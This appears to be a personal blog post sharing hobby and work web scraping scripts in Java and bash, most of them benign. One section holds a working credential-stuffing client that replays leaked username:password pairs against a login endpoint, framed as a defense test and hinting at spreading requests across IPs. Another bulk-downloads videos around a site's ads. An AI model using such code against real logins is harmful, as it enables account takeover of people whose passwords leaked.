Web Scraping Examples
Over the years, I've built a collection of small scripts that I use to crawl and fetch data for myself. They're all pretty hacky and quick, but I often find them useful.
Scrape to MySQL
This particular script was used to pull links off a page at work. Every hour it crawls the page and collects domains. The domains themselves act as primary keys, which prevents duplicates. This is a good example of how to use HtmlUnit to fetch data.
public void runMe() {
    try {
        webClient = new WebClient(BrowserVersion.FIREFOX_38);
        //webClient.getOptions().setThrowExceptionOnScriptError(false);
        page = webClient.getPage(url);
        //scrollToBottomOfPage();

        //get all section players on the page
        final List<?> sectionPlayers = page.getByXPath("(//div[@class='section-asdf'])");
        for (int i = 0; i < sectionPlayers.size(); i++) { //loop through them
            System.out.println("NAWICE... Lets get the asdf links!");
            HtmlDivision htmlDivision = (HtmlDivision) sectionPlayers.get(i);
            if (htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf").size() == 1) { //more than one blog posted
                //get the link that reveals the posts
                List<HtmlElement> repostLink = htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf");
                repostLink.get(0).click();
                webClient.waitForBackgroundJavaScript(5000); //wait for the ajax page to reload
                printLinksInSectionPlayer(htmlDivision);     //print the newly visible links

                //get the "show more" link
                List<HtmlElement> showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-asdf");
                if (showMoreLink.size() == 1) { //if we have a "show more" link...
                    showMoreLink.get(0).click(); //click it
                    webClient.waitForBackgroundJavaScript(5000); //wait for the ajax
                    printLinksInSectionPlayer(htmlDivision);     //print the newly visible links

                    //two links means we have next and prev buttons
                    while (htmlDivision.getElementsByAttribute("a", "class", "fav-asdf").size() == 2) {
                        showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-paging"); //get the next and prev buttons
                        showMoreLink.get(1).click(); //click the next button
                        webClient.waitForBackgroundJavaScript(5000);
                        printLinksInSectionPlayer(htmlDivision); //print the links
                    }
                }
            } else {
                printLinksInSectionPlayer(htmlDivision); //only one blog post, so just print it
            }
        }
        webClient.closeAllWindows();
    } catch (Exception e) {
        System.out.println("Welp, something went wrong...");
        e.printStackTrace();
    }
    System.out.println("DING! Toast is done!");
}
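The MySQL half isn't shown above, but it's only a few lines. Here's a minimal sketch of what the insert could look like, assuming a hypothetical links table whose domain column is the primary key (the table name, column names, and connection details are all placeholders, not the script's actual schema):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;

//Save one scraped domain. INSERT IGNORE silently skips rows whose
//primary key already exists, which is what de-duplicates the domains
//between hourly runs.
private void saveDomain(String domain) {
    String sql = "INSERT IGNORE INTO links (domain, first_seen) VALUES (?, NOW())";
    try (Connection conn = DriverManager.getConnection(
                "jdbc:mysql://localhost:3306/scraper", "user", "password");
         PreparedStatement stmt = conn.prepareStatement(sql)) {
        stmt.setString(1, domain);
        stmt.executeUpdate();
    } catch (SQLException e) {
        e.printStackTrace();
    }
}

Letting the database enforce uniqueness keeps the scraper dumb: it can re-submit every domain it sees, and the primary key quietly drops the repeats.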
Credential Stuffing
After the Yahoo! email security breach, we discovered automated scripts using credential-stuffing methods to access a client's domain. I wrote a similar attack and used it as a test case to prove our solution worked. Here's a sample of it.
private String getAuthToken(String username, String password) throws Exception {
    String url = "https://" + endpointPrefix + ".example.com/j_spring_security_check";
    URL obj = new URL(url);
    HttpURLConnection con = (HttpURLConnection) obj.openConnection();
    con.setInstanceFollowRedirects(false);

    //add request header
    con.setRequestMethod("POST");
    String urlParameters = "j_username=" + username + "&j_password=" + password;

    // Send post request
    con.setDoOutput(true);
    DataOutputStream wr = new DataOutputStream(con.getOutputStream());
    wr.writeBytes(urlParameters);
    wr.flush();
    wr.close();
    printTheRequest(con);

    //pull the session token out of the Set-Cookie headers
    String authToken = "";
    List<String> cookiesHeaders = con.getHeaderFields().get("Set-Cookie");
    for (String cookieHeader : cookiesHeaders) {
        HttpCookie cookie = HttpCookie.parse(cookieHeader).get(0);
        if (cookie.getName().equals("EXAMPLE_WD_WLJSESSIONID")) {
            authToken = cookie.getValue();
        }
    }
    return authToken;
}
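The stuffing itself is just getAuthToken() in a loop over leaked credential pairs. A minimal sketch of a driver, assuming a creds.txt file with one username:password pair per line (the file name, format, and success check are my placeholders, not the original test case):

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.List;

//Replay leaked username/password pairs against the login endpoint
//and record which ones succeed.
private void runStuffingTest() throws Exception {
    List<String> lines = Files.readAllLines(Paths.get("creds.txt"));
    for (String line : lines) {
        String[] parts = line.split(":", 2);
        if (parts.length < 2) continue; //skip malformed lines
        String token = getAuthToken(parts[0], parts[1]);
        if (!token.isEmpty()) { //a session cookie came back, so the login worked
            System.out.println("HIT: " + parts[0]);
        }
        Thread.sleep(500); //crude pacing; a real attack spreads requests across IPs
    }
}

The defense we were testing had to distinguish exactly this traffic pattern from legitimate logins, which is why the test client mimics it so literally.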
Monitor URL
This little bash script comes in handy when you're trying to prove a URL is inconsistently loading. Every 20 minutes it uses curl to visit a page and logs the full response, including the status code. In the case that prompted this script, our server was using a different DNS server than our firewall, and received an IP address to connect to that the firewall had not opened.
#!/bin/bash
# I often use this script to monitor connectivity. The output
# can be sent to your infrastructure team to prove a point...
while true
do
    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    echo `date` >> jm_watch_url.txt
    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    curl -v https://www.google.com/recaptcha/api/siteverify 2>&1 | tee -a jm_watch_url.txt
    sleep 1200  # 20 minutes
done
Video Scraping
Alright, maybe this one isn't all that ethical. I came across a series of videos online, but they were buried under just about the worst online ads. This script was used to pull a list of all the URLs and store them in a local in-memory database (actually persisted to local disk). That meant I could shut the script down and resume downloading the videos later. It also meant I didn't have to start over from the first video if something went wrong.
@Bean
public CommandLineRunner commandLineRunner(ApplicationContext ctx) {
    return args -> {
        //GetWebsiteB getWebsiteB = ctx.getBean(GetWebsiteB.class);
        //getWebsiteB.gatherLinks();
        //getWebsiteB.downloadLinks();
        GetWebsiteA getWebsiteA = ctx.getBean(GetWebsiteA.class);
        getWebsiteA.gatherLinks();
        getWebsiteA.downloadLinks();
    };
}
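The resume behavior all comes from the database: gatherLinks() writes every URL once, downloadLinks() flags each one as it finishes, and a restart only picks up the unflagged rows. Here's a sketch of that bookkeeping with Spring's JdbcTemplate, assuming H2 running in file mode (spring.datasource.url=jdbc:h2:file:./videodb) and a hypothetical videos table; the actual internals of GetWebsiteA aren't shown here:

import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;

//Assumed schema: CREATE TABLE IF NOT EXISTS videos
//  (url VARCHAR(1024) PRIMARY KEY, downloaded BOOLEAN DEFAULT FALSE);

@Autowired
private JdbcTemplate jdbcTemplate;

public void saveLink(String url) {
    //MERGE is H2's upsert. Only the url column is listed, so an existing
    //row is left alone (its downloaded flag survives a re-gather) and a
    //new row gets downloaded's default of FALSE.
    jdbcTemplate.update("MERGE INTO videos (url) KEY (url) VALUES (?)", url);
}

public List<String> remainingLinks() {
    //on restart, only the videos we haven't finished come back
    return jdbcTemplate.queryForList(
            "SELECT url FROM videos WHERE downloaded = FALSE", String.class);
}

public void markDone(String url) {
    jdbcTemplate.update("UPDATE videos SET downloaded = TRUE WHERE url = ?", url);
}

Because the database file lives on disk, killing the process mid-download costs nothing: the next run simply skips everything already marked done.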